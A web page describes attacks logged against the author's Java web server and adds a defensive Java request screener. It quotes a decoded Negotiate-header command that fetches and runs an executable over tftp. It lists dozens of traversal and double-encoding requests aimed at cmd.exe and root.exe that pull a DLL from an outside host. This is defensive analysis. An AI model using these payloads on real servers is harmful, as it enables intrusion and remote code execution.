Attacks & Espionage

When the JWebServer has been running for a longer time, I frequently see various attacks and espionage attempts.

tftp attack:
I receive this attack on average about once an hour:
GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCE...
If one Base64-decodes the string following "Negotiate" (about 6 KB in size), it turns out to contain, for example, the following string:
cmd /c tftp -i 172.179.185.131 GET NPFMONTR.exe&start NPFMONTR.exe&exit
The IP address and the name of the EXE file change constantly (e.g. ms-wks32.exe, cgy32win.exe). The download via tftp is only possible within 3 minutes of the GET request; after that you get a timeout. The EXE files are encrypted with PolyCrypt from JLabSoftware (http://jlabsoftware.com/).
If this string is executed (e.g. at a DOS prompt), "NPFMONTR.exe" is downloaded with the tftp program (Trivial File Transfer Protocol) and then run. I do not believe that running it is in the server's interest.
As far as I could research, there is a security hole in the Microsoft server behind this. Still, I find it questionable why a server should execute such a string at all.

Espionage/attack:
An espionage attack tried the following requests. The "Host:" header was always "www", and the "Connection:" header was always "close". Within a span of 50 seconds I received the following 76 requests (i.e. faster than one per second!):
- GET /scripts/root.exe?/c+dir HTTP/1.0
- GET /scripts/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /scripts/httpodbc.dll HTTP/1.0
- GET /MSADC/root.exe?/c+dir HTTP/1.0
- GET /MSADC/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /MSADC/httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0 
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /c/httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /d/httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../httpodbc.dll HTTP/1.0
In general, then, the attacker tries to reach parent directories, e.g. through a "scripts/" directory and the parent-directory operator "../". So if one were simply to build a File object from the GET request in Java and send that file to the client, this espionage attempt would at least partially succeed!
There are also attempts to run various DOS commands (tftp, dir, cmd.exe, root.exe, etc.) and to overwrite certain DLL files via the tftp command.
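The following is an added example, not code from JWebServer, showing how a small Java server can screen a request before the target is ever turned into a File object. It decodes percent escapes exactly once and insists on well-formed UTF-8 (which rejects the %c0%af, %c1%9c and %%35c variants above), refuses a path that still contains an escape after decoding (the %255c and %25%35%63 double-encoding variants), resolves the result against a document root and refuses anything that normalizes outside it, and finally flags the probe markers (cmd.exe, root.exe, tftp) seen in the log. A second method Base64-decodes an Authorization: Negotiate token and flags text that carries the "cmd /c" or "tftp -i" command seen in the decoded header above. The document root /var/www/htdocs, the class and method names, and the sample token fed to main are all assumptions made for this example.

```java
import java.nio.ByteBuffer;
import java.nio.charset.CharacterCodingException;
import java.nio.charset.CodingErrorAction;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;

/** Request screening for a small Java HTTP server (added example, not JWebServer code). */
public class RequestScreener {

    // Assumed document root; a real server would read this from its configuration.
    static final Path DOC_ROOT = Paths.get("/var/www/htdocs").toAbsolutePath().normalize();

    // Strings that appear in the probes logged above and not in requests for ordinary static files.
    static final String[] PROBE_MARKERS = {"cmd.exe", "root.exe", "tftp"};

    /** Returns null if the request target may be mapped to a file, otherwise the reason to refuse it. */
    public static String reject(String target) {
        int q = target.indexOf('?');
        String rawPath = q >= 0 ? target.substring(0, q) : target;   // the query string never names a file
        String decoded;
        try {
            decoded = strictPercentDecode(rawPath);
        } catch (IllegalArgumentException e) {
            return "bad encoding: " + e.getMessage();
        }
        // A single decoding pass must not leave another escape behind: %255c -> %5c is double encoding.
        if (decoded.indexOf('%') >= 0) return "double encoding";
        if (decoded.indexOf('\\') >= 0 || decoded.indexOf('\0') >= 0) return "backslash or NUL in path";
        String relative = decoded.startsWith("/") ? decoded.substring(1) : decoded;
        Path resolved = DOC_ROOT.resolve(relative).normalize();        // collapses every "../" segment
        if (!resolved.startsWith(DOC_ROOT)) return "escapes document root";
        String lower = target.toLowerCase();
        for (String m : PROBE_MARKERS) if (lower.contains(m)) return "known probe marker '" + m + "'";
        return null;
    }

    /** Decodes %XX escapes once and requires well-formed UTF-8, so %c0%af, %c1%9c and %%35c are refused. */
    static String strictPercentDecode(String s) {
        ByteBuffer buf = ByteBuffer.allocate(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c == '%') {
                if (i + 2 >= s.length()) throw new IllegalArgumentException("truncated escape");
                int hi = Character.digit(s.charAt(i + 1), 16), lo = Character.digit(s.charAt(i + 2), 16);
                if (hi < 0 || lo < 0) throw new IllegalArgumentException("non-hex escape at offset " + i);
                buf.put((byte) (hi << 4 | lo));
                i += 2;
            } else if (c < 0x80) {
                buf.put((byte) c);
            } else {
                throw new IllegalArgumentException("raw non-ASCII character at offset " + i);
            }
        }
        buf.flip();
        try {   // REPORT makes overlong sequences and stray continuation bytes throw instead of becoming U+FFFD
            return StandardCharsets.UTF_8.newDecoder()
                    .onMalformedInput(CodingErrorAction.REPORT)
                    .onUnmappableCharacter(CodingErrorAction.REPORT)
                    .decode(buf).toString();
        } catch (CharacterCodingException e) {
            throw new IllegalArgumentException("invalid UTF-8 in path");
        }
    }

    /** Flags an Authorization: Negotiate token whose decoded bytes carry a shell command line. */
    public static String rejectNegotiate(String headerValue) {
        String prefix = "Negotiate ";
        if (!headerValue.startsWith(prefix)) return null;
        byte[] raw;
        try {
            raw = Base64.getDecoder().decode(headerValue.substring(prefix.length()).trim());
        } catch (IllegalArgumentException e) {
            return "malformed base64 token";
        }
        String text = new String(raw, StandardCharsets.ISO_8859_1).toLowerCase();
        if (text.contains("cmd /c") || text.contains("tftp -i")) return "shell command inside token";
        return null;
    }

    public static void main(String[] args) {
        String[] targets = {                                // first six copied from the log excerpt above
            "/scripts/root.exe?/c+dir",
            "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
            "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
            "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
            "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
            "/scripts/..%25%35%63../httpodbc.dll",
            "/scripts/../../../boot.ini",                    // constructed: plain unencoded traversal
            "/index.html"                                    // constructed: ordinary request
        };
        for (String t : targets) {
            String why = reject(t);
            System.out.printf("%-55s %s%n", t, why == null ? "SERVE" : "REJECT: " + why);
        }
        // Constructed token: padding followed by a command line shaped like the one decoded above.
        String fake = Base64.getEncoder().encodeToString(
                "padding cmd /c tftp -i 192.0.2.10 GET dropper.exe&start dropper.exe".getBytes(StandardCharsets.ISO_8859_1));
        System.out.println("Negotiate token: " + rejectNegotiate("Negotiate " + fake));
    }
}
```

Running main prints SERVE only for /index.html; every log line is refused before any File is created, the first five for their encoding and the sixth because "%5c" survives the single decoding pass. The marker check is a log-derived heuristic and will also refuse a legitimate URL such as /docs/tftp.html, so it belongs in a logging or alerting path rather than in the file lookup itself; the path checks above it are the real protection.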


© 2004-2013 by Markus Krebs